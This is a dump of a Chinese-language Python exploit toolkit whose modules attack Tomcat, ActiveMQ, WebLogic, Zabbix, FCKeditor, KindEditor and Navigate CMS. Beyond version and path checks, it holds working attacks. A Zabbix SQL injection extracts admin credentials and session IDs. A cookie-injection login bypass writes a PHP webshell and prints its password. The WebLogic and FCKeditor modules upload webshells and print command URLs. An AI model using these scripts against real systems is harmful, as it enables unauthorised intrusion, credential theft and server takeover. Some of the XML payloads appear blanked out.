46 | print('未发现-Tomcat-CVE-2017-12617。')
47 |
48 | def attack(URL):
49 | print('[+]开始检测-Tomcat-CVE-2017-12617。[+]')
50 | shell_name = gen_shell()
51 | #print(shell_name)
52 | try:
53 | construct_put(URL, shell_name)
54 | except:
55 | print('shell上传错误。')
56 | print('[+]检测结束-Tomcat-CVE-2017-12617。[+]')
57 | print('\n')
58 |
59 |
60 | if __name__ == '__main__':
61 | attack()
62 |
--------------------------------------------------------------------------------
/activemq_vuln/ActiveMQ_uploadfile_cve_2016_3088.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import string
4 | from random import *
5 | import time
6 |
7 |
8 | '''
9 | Usage:
10 | moon.py -u activemq http://xx.xx.xx.xx:xxxx
11 | CVE-2016-3088
12 | 影响范围:Apache ActiveMQ 5.0.0 - 5.13.2 在5.12.x~5.13.x已默认关闭 5.14彻底删除相关文件
13 | 简介:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷。在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
14 | 漏洞原理:ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,构造PUT请求上传 webshell 到 fileserver 目录,然后通过 Move 方法将其移动到有执行权限的 admin/ 目录。这里移动文件需要具有相关权限,因此要想拿shel需要有activemq的账户和密码。
15 | 这里只测试上传这一步看看是否可行
16 | '''
17 |
18 | def attack(URL):
19 | print('[+]开始检测-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]')
20 | filename = gen_shell()
21 | url = URL + '/fileserver/'+filename+'.txt'
22 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
23 | headers={"User-Agent":user_agent}
24 | data="""CVE-2016-3088-file_upload_test"""
25 | try:
26 | requests.put(url, headers=headers, data=data)
27 | time.sleep(2)
28 | verify_response = requests.get(url, headers=headers)
29 | if verify_response.status_code == 200 and 'CVE-2016-3088-file_upload_test' in verify_response.text:
30 | print('文件上传成功!!!')
31 | print('上传文件地址: ' + url)
32 | else :
33 | print('访问上传文件地址:'+verify_response.status_code)
34 | print("未能成功上传文件。")
35 | except :
36 | print("未发现-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。")
37 | print('[+]检测结束-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]')
38 | print('\n')
39 | def gen_shell():
40 | min_char = 4
41 | max_char = 12
42 | allchar = string.ascii_letters + string.digits
43 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char)))
44 | return shell_name
45 |
46 |
47 | if __name__ == "__main__":
48 | attack()
49 |
--------------------------------------------------------------------------------
/kindeditor/kindeditor_under_4_1_5_fileupload.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 |
6 | '''
7 | Usage:
8 | moon.py -u kindeditor http://127.0.0.1:8080/kidneditor
9 | 影响:kindeditor<=4.1.5 文件上传漏洞 可上传txt和html,用作钓鱼或者跳转博彩网站
10 | 检测方式:这里采用版本判断和查看上传文件的方式确认漏洞是否存在
11 | 首先查询编辑器版本,如果在4.1.5版本之下,且存在相应的上传文件,则认为漏洞存在
12 | '''
13 |
14 | def attack(URL):
15 | print('[+]开始检测-kindeditor<=4.1.5文件上传漏洞。[+]')
16 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
17 | headers={"User-Agent":user_agent}
18 |
19 | #获取版本
20 | try:
21 | url1 = URL+'/kindeditor-min.js'
22 | verify_response = requests.get(url1, headers=headers)
23 | # print(verify_response.status_code)
24 | print('开始检查kindeditor版本,kindeditor<=4.1.5存在文件上传漏洞:')
25 | if verify_response.status_code ==200:
26 | print('此kindeditor的版本为:',verify_response.content[:40])
27 | print('-----------------------------------------------------')
28 | else:
29 | print('未发现获取版本的文件:',verify_response.status_code)
30 | print('-----------------------------------------------------')
31 | except:
32 | print('获取版本失败。')
33 |
34 | #检测上传页面是否存在
35 | urls = (
36 | '/asp/upload_json.asp',
37 | '/asp.net/upload_json.ashx',
38 | '/jsp/upload_json.jsp',
39 | '/php/upload_json.php'
40 | )
41 | for url in urls:
42 | url = URL + url
43 | try:
44 | verify_response = requests.get(url, headers=headers)
45 |
46 | if verify_response.status_code == 200:
47 | try:
48 | print('存在此页面:'+url+' '+str(verify_response.status_code))
49 | except:
50 | pass
51 | else :
52 | print('未发现此页面:'+url+' '+str(verify_response.status_code))
53 | continue
54 | except :
55 | print("Someerror!")
56 | print('[+]检测结束-kindeditor<=4.1.5文件上传漏洞。[+]')
57 | print('\n')
58 |
59 | if __name__ == "__main__":
60 | attack('')
61 |
62 |
63 |
--------------------------------------------------------------------------------
/tomcat/example_vulnerability.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u tomcat http://127.0.0.1:8080
7 | 影响范围:Tomcat: 全版本
8 | session操纵漏洞:Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例,
9 | 其中session样例(/examples/servlets/servlet/SessionExample)允许用户对session进行操纵。
10 | 因为session是全局通用的,所以用户可以通过操纵session获取管理员权限。
11 | (不一定都是全局的,如果path只在examples下,那就无法利用)。
12 | 利用此漏洞需要知道相关后台登录后的session键值对,然后写入到session中,利用条件苛刻。
13 | https://cloud.tencent.com/info/2e03f26090fe592b6c7aa933dd6c0f94.html
14 | 解决办法:安装完tomcat后,删除$CATALINA_HOME/webapps下默认的所有目录文件* rm -rf /srv/apache-tomcat/webapps/*
15 | '''
16 |
17 | def attack(URL):
18 | urls = (
19 | '/examples/servlets/servlet/SessionExample', #200
20 | '/examples/', #304
21 | '/docs/', #304
22 | '/docs/BUILDING.txt',
23 | '/docs/RUNNING.txt',
24 | '/manager/html', # 401
25 | '/host-manager/html', #401
26 | '/icons/',
27 | '/manual/',
28 | '/examples/jsp/snp/snoop.jsp',
29 | '/lib/catalina.jar',
30 | '/conf/tomcat-users.xsd',
31 | '/bin/catalina-tasks.xml'
32 | )
33 |
34 | print('[+]开始检测-Tomcat-example_vulnerability。[+]')
35 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36 | headers={"User-Agent":user_agent}
37 | for url in urls:
38 | url = URL + url
39 | try:
40 | verify_response = requests.get(url, headers=headers)
41 |
42 | if verify_response.status_code == 200 or 304 or 401:
43 | try:
44 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断
45 | except Exception:
46 | pass
47 | else:
48 | continue
49 | except Exception:
50 | print("Someerror!")
51 | print('[+]检测结束-Tomcat-example_vulnerability。[+]')
52 | print('\n')
53 |
54 | if __name__ == "__main__":
55 | attack()
56 |
--------------------------------------------------------------------------------
/weblogic/CVE_2017_3506.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # auther:dayu
3 | import requests
4 | import re
5 |
6 | heads = {
7 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
9 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
10 | 'Content-Type': 'text/xml;charset=UTF-8'
11 | }
12 |
13 |
14 | def attack(url):
15 | if not url.startswith("http"):
16 | url = "http://" + url
17 | if "/" in url:
18 | url += '/wls-wsat/CoordinatorPortType'
19 | post_str = '''
20 |
21 |
22 |
23 |
24 |
38 |
39 |
40 |
41 |
42 |
43 | '''
44 |
45 | print('[+]开始检测-Weblogic-CVE-2017-3506。[+]')
46 | try:
47 | response = requests.post(
48 | url, data=post_str, verify=False, timeout=5, headers=heads)
49 | response = response.text
50 | response = re.search(
51 | r"\.*\<\/faultstring\>", response).group(0)
52 | except Exception:
53 | response = ""
54 |
55 | if 'java.lang.ProcessBuilder' in response or "0" in response:
56 | print('[+]发现 CVE-2017-3506 !!!')
57 | else:
58 | print('[-]未发现 CVE-2017-3506 ')
59 | print('[+]检测结束-Weblogic-CVE-2017-3506。[+]')
60 | print('\n')
61 |
62 |
63 | if __name__ == '__main__':
64 | attack()
65 |
--------------------------------------------------------------------------------
/weblogic/CVE_2017_10271.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 | from random import *
6 | import string
7 |
8 |
9 |
10 | '''
11 | Usage:
12 | moon.py -u weblogic http://127.0.0.1:7001
13 | Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0
14 | Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
15 | 访问:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType ,如果存在相关内容则存在漏洞
16 | '''
17 |
18 | def gen_shell():
19 | min_char = 4
20 | max_char = 12
21 | allchar = string.ascii_letters + string.digits
22 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char)))
23 | return shell_name
24 |
25 |
26 | def attack(URL):
27 | print('[+]开始检测-Weblogic-CVE-2017-10271。[+]')
28 | shellname = gen_shell()
29 | data = """
30 |
31 |
32 |
33 |
34 |
55 |
56 |
57 |
58 |
59 | """
60 | url = f'{URL}/wls-wsat/CoordinatorPortType'
61 | #proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
62 | headers = {"Content-Type":'text/xml',
63 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}
64 | try:
65 | r = requests.post(url,data=data, headers=headers)
66 | print('上传返回值为500为成功。上传返回值为:' + str(r.status_code))
67 | try:
68 | r1 = requests.get(f'{URL}/bea_wls_internal/{shellname}.jsp')
69 | if r1.status_code == 200:
70 | print(f'webshell地址为:{URL}/bea_wls_internal/{shellname}.jsp?pwd=fff&cmd=whoami')
71 | else:
72 | print('获取shell失败。')
73 | except:
74 | print('获取shell失败。')
75 | except Exception:
76 | print('访问网页失败,未发现-Weblogic-CVE-2017-10271。')
77 |
78 | print('[+]检测结束-Weblogic-CVE-2017-10271。[+]')
79 | print('\n')
80 |
81 | if __name__ == "__main__":
82 | attack()
--------------------------------------------------------------------------------
/zabbix_vuln/Authentication_Bypass.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u zabbix http://127.0.0.1:8080
7 | 相关链接:https://cxsecurity.com/issue/WLB-2019100030
8 | 这个漏洞的话,姑且看看吧。测试的时候手里环境不是很全,可能有问题,上面原始脚本是perl的,可以试一下
9 | 影响范围:Zabbix <= 4.4
10 | The target is vulnerable. Try to open these links:
11 | https://TARGET/zabbix/zabbix.php?action=dashboard.view
12 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
13 | https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
14 | https://TARGET/zabbix/overview.php?ddreset=1
15 | https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
16 | https://TARGET/zabbix/latest.php?ddreset=1
17 | https://TARGET/zabbix/charts.php?ddreset=1
18 | https://TARGET/zabbix/screens.php?ddreset=1
19 | https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
20 | https://TARGET/zabbix/srv_status.php?ddreset=1
21 | https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
22 | https://TARGET/zabbix/hostinventories.php?ddreset=1
23 | https://TARGET/zabbix/report2.php?ddreset=1
24 | https://TARGET/zabbix/toptriggers.php?ddreset=1
25 | https://TARGET/zabbix/zabbix.php?action=dashboard.list
26 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
27 | '''
28 |
29 | def attack(URL):
30 | urls = (
31 | '/zabbix.php?action=dashboard.view',
32 | '/zabbix.php?action=dashboard.view&ddreset=1',
33 | '/zabbix.php?action=problem.view&ddreset=1',
34 | '/overview.php?ddreset=1',
35 | '/zabbix.php?action=web.view&ddreset=1',
36 | '/latest.php?ddreset=1',
37 | '/charts.php?ddreset=1',
38 | '/screens.php?ddreset=1',
39 | '/zabbix.php?action=map.view&ddreset=1',
40 | '/srv_status.php?ddreset=1',
41 | '/hostinventoriesoverview.php?ddreset=1',
42 | '/hostinventories.php?ddreset=1',
43 | '/report2.php?ddreset=1',
44 | '/toptriggers.php?ddreset=1',
45 | '/zabbix.php?action=dashboard.list',
46 | '/zabbix.php?action=dashboard.view&dashboardid=1'
47 | )
48 |
49 | print('[+]开始检测- Zabbix 4.2 - Authentication Bypass。[+]')
50 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
51 | headers={"User-Agent":user_agent}
52 | for url in urls:
53 | url = URL + url
54 | try:
55 | verify_response = requests.get(url, headers=headers)
56 |
57 | if verify_response.status_code == 200 or 304 or 401:
58 | try:
59 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断
60 | except Exception:
61 | pass
62 | else:
63 | continue
64 | except Exception:
65 | print("Someerror!")
66 | print('[+]检测结束-Zabbix 4.2 - Authentication Bypass。[+]')
67 | print('\n')
68 |
69 | if __name__ == "__main__":
70 | attack()
71 |
--------------------------------------------------------------------------------
/zabbix_vuln/zabbix_sql_CVE_2016_10134.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import re
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u zabbix http://x.x.x.x:xx
8 | zabbix的 profileIdx2 参数存在问题,存在sql注入。
9 | 影响范围,3.0.3 成功, 3.2.6 失败。
10 | 禁用guest账户,升级版本
11 | '''
12 |
13 |
14 | def attack(URL):
15 | print('[+]开始检测-zabbix_sql-CVE-2016-10134。[+]')
16 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
17 | headers={"User-Agent":user_agent}
18 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
19 | try:
20 | res = requests.get(url,headers=headers)
21 | xresponse = res.text
22 | print('访问URL成功,开始进行zabbix_sql注入漏洞检测。')
23 | except Exception:
24 | print('[-]未发现zabbix_sql注入漏洞。')
25 | else:
26 | try:
27 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
28 | res = requests.get(url, headers=headers)
29 | response = res.text
30 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
31 | results = result_reg.findall(response)
32 | print('管理员、用户名密码为:'+results[0])
33 | except Exception:
34 | print('[-]获取用户名及密码失败。')
35 | try:
36 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
37 | res = requests.get(url, headers=headers)
38 | response = res.text
39 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
40 | results = result_reg.findall(response)
41 | print('SessionID为:' + results[0])
42 | except Exception:
43 | print('[-]获取SessionID失败。')
44 | print('[+]检测结束-zabbix_sql-CVE-2016-10134。[+]')
45 | print('\n')
46 |
47 |
48 | if __name__ == '__main__':
49 | attack()
50 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_version.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from bs4 import BeautifulSoup
4 | import requests
5 | import re
6 |
7 | '''
8 | Usage:
9 | moon.py -u fck http://127.0.0.1:8080 #此脚本需更新,效果较差
10 |
11 | '''
12 |
13 | def attack(URL):
14 | #获取fck版本
15 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
16 | headers={"User-Agent":user_agent}
17 | url = URL + '/_whatsnew.html'
18 | try:
19 | verify_response = requests.get(url, headers=headers)
20 | html = verify_response.content
21 | soup = BeautifulSoup(html, "lxml")
22 | print("[+]此Fckeditor版本为:"+soup.h3.string.strip())
23 |
24 | except :
25 | print("[-]获取Fckeditor版本错误!!")
26 |
27 | #获取fck文件上传路径,这里针对高版本有问题。得推倒从来
28 | urls = (
29 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
30 | '/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
31 | '/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
32 | '/editor/filemanager/browser/default/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
33 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
34 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
35 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
36 | '/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
37 | '/editor/filemanager/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
38 | '/editor/filemanager/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
39 | '/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
40 | '/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/'
41 | '/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F',
42 | '/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F',
43 | '/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F'
44 | )
45 | try:
46 | for url in urls:
47 | url = URL + url
48 |
49 | verify_response = requests.get(url, headers=headers)
50 | html = verify_response.content.decode('utf-8')
51 | soup = re.search(r'', html)
52 | print("[+]此Fckeditor上传路径为:" + soup.group())
53 | break
54 | except:
55 | print('[-]获取此Fckeditor上传路径错误')
56 |
57 | #print('[+]获取文件上传目录2.5 2.6:'+URL+'/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F')
58 |
59 |
60 |
61 | if __name__ == "__main__":
62 | attack()
63 |
64 |
--------------------------------------------------------------------------------
/navigate_vuln/navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from requests_toolbelt.multipart.encoder import MultipartEncoder
4 | import sys
5 |
6 | r'''
7 | Usage:
8 | moon.py -u navigate http://x.x.x.x:xx
9 | V2.8版本测试存在此漏洞。
10 | 参考 https://www.exploit-db.com/exploits/45561/
11 | https://github.com/rapid7/metasploit-framework/pull/10704
12 | 上面msf的利用脚本会向该cms的/navigate/navigate_info.php文件写入shell,以下脚本也是利用的这个思路.
13 | 因此如果/navigate/navigate_info.php文件不存在,会造成shell写入失败。
14 | Navigate CMS v2.8 测试成功
15 | 绕过登录限制
16 | cookie' => 'navigate-user=\" OR TRUE--%20'
17 | '''
18 |
19 |
20 | def attack(URL):
21 | print('[+]开始检测-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]')
22 | user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
23 | headers={"User-Agent":user_agent}
24 | try:
25 | urls = [URL + '/login.php',URL+'/navigate/login.php']
26 | for url in urls:
27 | print('检测的URL为:'+url)
28 | cookies = {'navigate-user':r'\" OR TRUE--%20'}
29 | r = requests.get(url,headers=headers,cookies=cookies,verify=False,allow_redirects=False)
30 | if r.status_code == 302:
31 | print('[+]返回值为:'+str(r.status_code)+' 可能存在漏洞。')
32 | #print(r.cookies.items()[0][1])#获取session_id
33 | global Session_id
34 | Session_id = r.cookies.items()[0][1]
35 | else:
36 | print('[-]返回值为:' + str(r.status_code) + ' 不存在漏洞。')
37 | except:
38 | print('[-]未发现该漏洞。!')
39 | else:
40 | try:
41 | url = URL + '/navigate/navigate_info.php'
42 | r = requests.get(url)
43 | scode = r.status_code
44 | if scode == 200:
45 | print('[+]访问/navigate/navigate_info.php成功,开始写入。')
46 | try:
47 | pwd = sys.argv[0][:33] # 获取当前文件夹的路径
48 | url = URL + f'/navigate/navigate_upload.php?id=../../../navigate_info.php&session_id={Session_id}&engine=picnik'
49 | m = MultipartEncoder(fields={
50 | 'Content-Disposition': 'form-data; name="file"; filename="tCc2QJ7PUxSC"',
51 | 'file': ('shellname', open(f'{pwd}\\navigate_vuln\\88.php', 'rb'), 'image/jpeg'),
52 | })
53 | headers = {
54 | 'Content-Type': m.content_type,
55 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
56 | }
57 | r = requests.post(url, data=m, headers=headers)
58 | #print(r.status_code) #值为200上传正常
59 | print('一句话地址为:' + URL + '/navigate/navigate_info.php')
60 | print('密码为:' + 'tBjyWW3456tBjyWWtBjyWW87ttBjyWW')
61 | except:
62 | print('上传shell发生错误。')
63 | else:
64 | print('[-]访问/navigate/navigate_info.php失败,无法进行shell写入。')
65 | except:
66 | print('[-]访问/navigate/navigate_info.php发生错误。')
67 |
68 | print('[+]检测结束-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]')
69 | print('\n')
70 |
71 |
72 | if __name__ == '__main__':
73 | attack()
74 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_dangerfile.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u fck http://127.0.0.1:8080
7 | '''
8 |
9 |
10 | def attack(URL):
11 | urls = (
12 | '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
13 | '/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp',
14 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php',
15 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp',
16 | '/FCKeditor/editor/filemanager/browser/default/connectors/test.html',
17 | '/FCKeditor/editor/filemanager/upload/test.html',
18 | '/FCKeditor/editor/filemanager/connectors/test.html',
19 | '/FCKeditor/editor/filemanager/connectors/uploadtest.html',
20 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector',
21 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
22 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
23 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
24 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp',
25 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/jsp/connector.jsp',
26 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php',
27 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php',
28 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp',
29 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp',
30 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp',
31 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp',
32 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php',
33 | '/editor/filemanager/browser/default/connectors/test.html',
34 | '/editor/filemanager/upload/test.html',
35 | '/editor/filemanager/connectors/test.html',
36 | '/editor/filemanager/connectors/uploadtest.html',
37 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector'
38 | )
39 |
40 | print('[+]开始检测-Fckeditor敏感目录。[+]')
41 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
42 | headers = {"User-Agent":user_agent}
43 | for url in urls:
44 | url = URL + url
45 | try:
46 | verify_response = requests.get(url, headers=headers)
47 | if verify_response.status_code == 200:
48 | print('存在此页面:'+url)
49 | else:
50 | continue
51 | except Exception:
52 | print("Someerror!")
53 | print('[+]检测结束-Fckeditor敏感目录。[+]')
54 | print('\n')
55 |
56 |
57 | if __name__ == "__main__":
58 | attack()
59 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_getshell.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from requests_toolbelt.multipart.encoder import MultipartEncoder
3 | import requests
4 | import string
5 | from random import *
6 | import re
7 | import sys
8 |
9 | '''
10 | Usage:
11 | moon.py -u fck http://127.0.0.1:8080
12 | fck <2.4.x版本(也就是2.4.x及以下)的File参数时为黑名单验证,可以通过上传.asa、.cer、.asp;jpg(针对IIS6)。
13 | 如果asa、cer不被解析,还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。
14 | 实际测试过程中还是上传asa可以,以下脚本也基于asa上传
15 | fck编辑器如要上传文件需配置相关项目,如果出现上传成功且获取上传路径失败,就可能是配置不允许上传。
16 | 返回包出现这类文字基本上就是设置不允许上传:This connector is disabled. Please check the
17 | '''
18 |
19 |
20 | def gen_shell():
21 | min_char = 4
22 | max_char = 12
23 | allchar = string.ascii_letters + string.digits
24 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char)))
25 | return shell_name
26 |
27 |
28 | def geturl(URL):
29 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
30 | headers={"User-Agent":user_agent}
31 |
32 | urls = (
33 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck25
34 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck243
35 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/',#fck21,#fck22,fck23
36 | )
37 | for url in urls:
38 | url = URL + url
39 | try:
40 | verify_response = requests.get(url, headers=headers)
41 | html = verify_response.content.decode('utf-8')
42 | soup = re.search(r'', html)
43 | print("此Fckeditor上传路径为:" + soup.group(1))
44 | return soup.group(1)
45 | break
46 | except Exception:
47 | pass
48 |
49 |
50 | def attack(URL):
